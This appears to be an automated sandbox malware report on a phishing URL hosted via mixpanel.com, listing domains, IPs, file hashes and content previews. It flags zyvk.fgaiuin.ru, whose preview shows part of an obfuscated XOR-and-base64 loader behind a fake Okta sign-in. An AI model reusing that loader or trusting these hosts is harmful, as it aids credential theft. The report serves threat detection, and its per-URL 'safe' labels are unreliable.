                                              35.186.235.23
                                              truefalse
                                                high
                                                d19d360lklgih4.cloudfront.net
                                                18.164.124.110
                                                truefalse
                                                  high
                                                  objects.githubusercontent.com
                                                  185.199.109.133
                                                  truefalse
                                                    high
                                                    api-eks-2.ext.prod.honeycomb.io
                                                    54.175.175.74
                                                    truefalse
                                                      unknown
                                                      beacons.gcp.gvt2.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        prudn87837498798487434.us-lax-1.linodeobjects.com
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          ok4static.oktacdn.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            api.honeycomb.io
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              NameMaliciousAntivirus DetectionReputation
                                                              https://api.honeycomb.io/v1/tracesfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                                high
                                                                https://zyvk.fgaiuin.ru/rs1tEVctIEvVMForyhoqljWxFNIghHfWamSauodo7dwGpwh40leoQqcylchef193false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://zyvk.fgaiuin.ru/rqmMm82swDD0R4oJbc7jZ02XcJruly8cwZzt5zjAsfwfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://zyvk.fgaiuin.ru/GDSherpa-bold.woff2false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                                  high
                                                                  https://a.nel.cloudflare.com/report/v4?s=K0hGeEE3BqHQG%2FLW4BDHgq4XatkjykvpVSj6vszsoPvdsun6e7No4pk4eMBMRCbnhOWpVknjKHA9krtPuKAjIv%2FiVbxc1AGaHbqkDdQlyNqgfUjd1I%2BfwoGJZcblfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                    high
                                                                    https://zyvk.fgaiuin.ru/GDSherpa-vf.woff2false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://prudn87837498798487434.us-lax-1.linodeobjects.com/900pppejdedr.htmlfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://zyvk.fgaiuin.ru/mnEMzb8jUNnKVyAT3k5kL57E6Hgba7eIuvr3UyuGz2C3Jh6U06zE378147false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                                      high
                                                                      https://zyvk.fgaiuin.ru/qrkq6tjIc3r5nBX8S7OdUDvbneJNdxGQmnJ7dx0HaqNlcmCbG67140false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mix&oit=1&cp=3&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://zyvk.fgaiuin.ru/GDSherpa-regular.wofffalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://zyvk.fgaiuin.ru/wx4JzFCVEPK2a4BmjUySfrZrcstE1RfsssMSRW12127false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://automotorespascualito.com/hpp/index.phpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/false
                                                                        unknown
                                                                        https://zyvk.fgaiuin.ru/ijy2fRQQJuz4z04afoy15ExbmbUYT6xx10nJD7vmnUY6HNJ3QW1gCt7rwnOgycX0cZOI7rFef205false
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://api.sprig.com/sdk/1/environments/9sZai6GO-WSS/configfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://zyvk.fgaiuin.ru/opTZQRdFZXI9raOJwdpsyGfsdyKJ2TK5PdTfLOBJSR9iV5IPstBSa36UESJdcDFjfpdeY2Hne2mI0PwYCVcd240false
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://zyvk.fgaiuin.ru/GDSherpa-bold.wofffalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://zyvk.fgaiuin.ru/favicon.icofalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                          high
                                                                          https://zyvk.fgaiuin.ru/GDSherpa-vf2.woff2false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://zyvk.fgaiuin.ru/nggvcwumpavzvzewll2ca4q3e8250yolg5nmb?KZRWZHIEFWFHRFNtrue
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/wx15xRgFt39795h1KKeDjVzWpWO0OrsbkvAK4y71EU515ot90176false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/apP1I1v3t06SAbzw9mvtIB0Mq1bYC8AwtydbW1CC5CJBgYfG4rBstbLOiHPj8false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://o81318.ingest.us.sentry.io/api/4508649566830592/envelope/?sentry_version=7&sentry_key=8da60ce5d69f3663b76685b5a017bfd4&sentry_client=sentry.javascript.react%2F8.50.0false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/stIrN6fgetKZ2pEHJbr5ECSIda45Rwn0FB9toxb2HlSxdtTGNoGturGef251false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/klBiF5nBFGI9ZBA6VNTLBYDtbLEUH4xH2WD565XSQVInIrw2Ga7S5GyD4TQujTVYuv213false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/12aNaBkhbtQKolWIvxydkeYP8915false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://kwzh.kdyukk.ru/machlo$agpzrfcbfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/GDSherpa-regular.woff2false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/ozq0UiZHd9C8b8YcCD8tmcoe1yeU2NWau1c7Os7ofalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mi&oit=1&cp=2&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/xyEzOlhUCiierszzc4ef28false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://zyvk.fgaiuin.ru/34RyVvuzJYx0eebApfCjIz8yUE5ijn9sGqnQAmC67103false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            34.117.152.135
                                                                            mixpanel.comUnited States
                                                                            139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                            54.175.175.74
                                                                            api-eks-2.ext.prod.honeycomb.ioUnited States
                                                                            14618AMAZON-AESUSfalse
                                                                            140.82.112.3
                                                                            github.comUnited States
                                                                            36459GITHUBUSfalse
                                                                            151.101.130.137
                                                                            code.jquery.comUnited States
                                                                            54113FASTLYUSfalse
                                                                            142.250.81.238
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            130.211.5.208
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            185.199.109.133
                                                                            objects.githubusercontent.comNetherlands
                                                                            54113FASTLYUSfalse
                                                                            35.190.80.1
                                                                            a.nel.cloudflare.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            35.186.235.23
                                                                            cdn.mxpnl.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.80.35
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            52.86.181.185
                                                                            api.sprig.comUnited States
                                                                            14618AMAZON-AESUSfalse
                                                                            142.250.64.68
                                                                            www.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            192.185.156.36
                                                                            automotorespascualito.comUnited States
                                                                            46606UNIFIEDLAYER-AS-1USfalse
                                                                            104.21.84.180
                                                                            kwzh.kdyukk.ruUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.251.40.234
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            18.164.124.110
                                                                            d19d360lklgih4.cloudfront.netUnited States
                                                                            3MIT-GATEWAYSUSfalse
                                                                            142.251.167.84
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            34.225.45.182
                                                                            unknownUnited States
                                                                            14618AMAZON-AESUSfalse
                                                                            172.67.158.246
                                                                            zyvk.fgaiuin.ruUnited States
                                                                            13335CLOUDFLARENETUStrue
                                                                            172.235.36.35
                                                                            us-lax-1.linodeobjects.com.akadns.netUnited States
                                                                            20940AKAMAI-ASN1EUfalse
                                                                            34.120.195.249
                                                                            o81318.ingest.us.sentry.ioUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.251.41.3
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            104.17.25.14
                                                                            cdnjs.cloudflare.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            IP
                                                                            192.168.2.18
                                                                            192.168.2.23
                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1649398
                                                                            Start date and time:2025-03-26 18:41:45 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                            Sample URL:https://mixpanel.com/p/FWfQuhi1aNTS16WPXLxRfi
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • EGA enabled
                                                                            Analysis Mode:stream
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.phis.evad.win@22/91@74/176
                                                                            • Exclude process from analysis (whitelisted): svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 23.9.183.29, 142.250.80.35, 142.250.81.238, 142.251.167.84, 142.251.40.142
                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net
                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: https://mixpanel.com/p/FWfQuhi1aNTS16WPXLxRfi
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (386)
                                                                            Category:downloaded
                                                                            Size (bytes):59237
                                                                            Entropy (8bit):5.145954562652291
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7DDB7ACC7087EEB400D92B70AC9D0244
                                                                            SHA1:496B18A9E54215B13F0A43704B0096BA0C5F3749
                                                                            SHA-256:C1CF1C0DDCF6105C4827A7FA32D73898DE03BA86E9D3325D014D401CAE6562F0
                                                                            SHA-512:8A9423EF230D95288FFFE6E16CC13CBF121191554163B6254D7E67C90AE94427E7D8101E8AE783046EA4AFAC912D27C9654CDCB7FE86A59DA17E7C9DD6A285D3
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/5efc0b6656f325e7944e/vendors-node_modules_tanstack_react-table_build_lib_index_mjs.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="1de14db9-fa85-4193-917e-be6dbfbbef2b",e._sentryDebugIdIdentifier="sentry-dbid-1de14db9-fa85-4193-917e-be6dbfbbef2b")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (9592)
                                                                            Category:downloaded
                                                                            Size (bytes):4938395
                                                                            Entropy (8bit):5.4332324617349315
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0716CD4DC753DA133E14CE745DC2E532
                                                                            SHA1:D675DF79491FF25A77EC3EA941AA99D323AE66B8
                                                                            SHA-256:B0292483E5E0E6DE5B0D6D0077615B6663464ED6C7AF96C92D23567158A51DD5
                                                                            SHA-512:237E64A92BAE35133D11B16014355049416A6550531B7F6653AF23CB71D3007DC0E592BA9BE58CBEFF3245FBF992F0159CBC584792CE09A1C76491EA80315184
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/64815ff1d98410022509/iron_common_contexts_storage-manager_util_ts-iron_common_report_contexts_report-info_index_ts-aa683e.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="e537bb5a-4450-4ea9-a05c-017458c4b6e1",e._sentryDebugIdIdentifier="sentry-dbid-e537bb5a-4450-4ea9-a05c-017458c4b6e1")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:data
                                                                            Category:downloaded
                                                                            Size (bytes):112159
                                                                            Entropy (8bit):5.202870507917661
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2EA3E2D7AE13D449AF744484ABE31EFC
                                                                            SHA1:52CF7A9F2AB738AD8C03F1BD0A3EAF29E22549BF
                                                                            SHA-256:4BCE03707B8BA4A296110917EE9614BA76E0B0953BFEE7B74135C18D3C1680B3
                                                                            SHA-512:0B4C0C7BF16C5133FBD3F9C936617EA5F959093C48FC106A4879AC186E9E7B50A5AB4A386786834BE884FF65B3038C58A3372810937E864068FE0F340AE9F502
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/2249e94ca4d63ac80f25/vendors-node_modules_liveblocks_core_dist_index_mjs.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="bfec71da-28e9-41c3-bd40-1b7466f5f531",e._sentryDebugIdIdentifier="sentry-dbid-bfec71da-28e9-41c3-bd40-1b7466f5f531")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (599)
                                                                            Category:downloaded
                                                                            Size (bytes):604
                                                                            Entropy (8bit):4.893109832510839
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BDCFCCD7267596CE0835C51B1FBD5049
                                                                            SHA1:308D55C5560BA7B7F2F62DE5712039F0302590AE
                                                                            SHA-256:97EFDA270D22BFE2791E3CD46E06E109F3D8222CBB459B54A6B9DE59496A2A84
                                                                            SHA-512:709D6FE48AB8DFDBD03FCE444BC285A69D56D0878CA53AFD887AA0FC306E89173A294D5C09C072E765EEF502BDBB9F427592ED276A5FCFDC36174E35FBB0C6EC
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2F&oit=3&cp=13&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/",["mixpanel competitors","mixpanel com login","mixpanel company","mixpanel community","mixpanel com pricing","mixpanel company size","mixpanel com ceo","mixpanel com linkedin","mixpanel com zoominfo","mixpanel com docs"],["","","","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggestrelevance":[601,600,557,556,555,554,553,552,551,550],"google:suggestsubtypes":[[30],[30],[30],[30],[30],[30],[30],[30],[30],[30]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2364)
                                                                            Category:downloaded
                                                                            Size (bytes):41971
                                                                            Entropy (8bit):5.209990977557097
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BB8385CBCA678D2BA387F3B0842A0D9C
                                                                            SHA1:1EE2116D130DC434C82FC7DB32B441F159448941
                                                                            SHA-256:FC579D564638A8E7F198452C20671D0ED28126C3E129DD4680A102DFB827EAF0
                                                                            SHA-512:2AA3C77B4C2D175835A8B74706345A4F85F8A20CE6115AB157C9561D7119B23F47EEBA49938A6D16FC3401D04306100032A3F5B0C41B41C426E7AD127D655361
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/07ac9d10d7cfbe04c7ea/iron_apps_boards_src_dashboards-app_components_grid-layout_index_ts-iron_common_util_async-co-73bff1.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},t=(new e.Error).stack.t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="41000e4d-8505-435d-8f11-f5ebad266400",e._sentryDebugIdIdentifier="sentry-dbid-41000e4d-8505-435d-8f11-f5ebad266400")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}"use strict";(self.webpackChunkanalytics=self.webpac
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (17081), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):22148
                                                                            Entropy (8bit):5.915837066318976
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:E5B352D623B23DEA44E6C2FE6AC9612E
                                                                            SHA1:E20756F5AF29D945F7A4ECB1D4FAE5878863AC89
                                                                            SHA-256:6A7F98A2972D30B74ABB3C546D0651BC939DFDD8EA6DA609F397CEEFCC15A63D
                                                                            SHA-512:01545222E5B602D1F9F8D40EA21D375AB46925054AAA8922F97793E2F592B393C6F8FB76B1BD2105D00DB2E41BD75E7DB4A514581659245E0620D4905805D77A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/vEWf_VsEQpE6SZ7Y1x7k/
                                                                            Preview:<script>..function omWNURtTWd(klUqpveDWV, XMLqTNRGyl) {..let YazaRZMSwY = '';..klUqpveDWV = atob(klUqpveDWV);..let boDsSZHElD = XMLqTNRGyl.length;..for (let i = 0; i < klUqpveDWV.length; i++) {.. YazaRZMSwY += String.fromCharCode(klUqpveDWV.charCodeAt(i) ^ XMLqTNRGyl.charCodeAt(i % boDsSZHElD));..}..return YazaRZMSwY;..}..var RGElhdhSES = omWNURtTWd(`UTULGxkWJFgmEA57SgEEEiALb01CJQcNFUg6CSAHHz9GCh8LfxIkFwg0EURDSGZWZUwALwZHGhVyRmlNHiUaAAASbnVfXh4lGgAAEnALJwFQZAAdBBYjQnpNDiIGAwNIMxQ6FwkgBAgCA34bOg9CJwIICEk8ETcRQiUaEAASP1U/EUJyRlheV38bJxsdMgdEGhV+FTwMQywbS05afws2EAQ2HFd9bF1yaREONAEZBFhdcjsHGmYuHB4FJBE6DEUnHAYSTncZAjsKDS9cGAI9FDs7NRQeChlTYyICKAYlBQVCPAgxMgQlMQ8NQgolIhJbXgoFJxgEFwAEAyoAHQ03XyQxHRpVDyANAAQ9KiMGFHMOCjcOOBo7MBskOytIABM6IDs1HBgzQiBgGmYrGCIwJxwFOz47ODpzWCUdCiUhZxpcHC8/Ci0TMhYGNQwfIBkNIDEdESMFASgXLxM5MisuBw8NQgolIhJbXgoFEQY/Yj5lAzp/HSA0VjcxOCQEJFs/QCk9MiY7OnMaIBoVHjs7UiMFBTsGP2MuITg6c1glHSA7IhA0Xxw/XEAyFxQvBioQHTMoLz8xOBYBIz87BgJiTDwuLgQFDSdTOhwSDhskASgfPAgiOQADFxggOBUeOzwjCg8r
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:C++ source, Unicode text, UTF-8 text, with very long lines (1892)
                                                                            Category:downloaded
                                                                            Size (bytes):183943
                                                                            Entropy (8bit):5.346973138706827
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:30F5144039F567F2CAD217F823CC9F22
                                                                            SHA1:494270BA8A7E98A61872D42170367DA01CC5F686
                                                                            SHA-256:60AEA7B210872C2433E8BE4E4AF5BF1921F944710007BE5D3E09D201DF435633
                                                                            SHA-512:34B0717D240F7169A8F6D604BCE6AD3F3D653EE19323C33B021B5E6907F7721A97DE077F6A0D20E29B4609F3F74E74044368935BA3189B8F38EC85D5AC163A74
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/129db95fea2e103babb6/common/node_modules.min.js
                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},n=(new e.Error).stack.n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="54876352-70e0-49fd-82cb-0d57aa84df5d",e._sentryDebugIdIdentifier="sentry-dbid-54876352-70e0-49fd-82cb-0d57aa84df5d")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (10450)
                                                                            Category:downloaded
                                                                            Size (bytes):10498
                                                                            Entropy (8bit):5.327380141461276
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:E0D37A504604EF874BAD26435D62011F
                                                                            SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                            SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                            SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                            Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                            Category:downloaded
                                                                            Size (bytes):28000
                                                                            Entropy (8bit):7.99335735457429
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                            SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                            SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                            SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/GDSherpa-bold.woff2
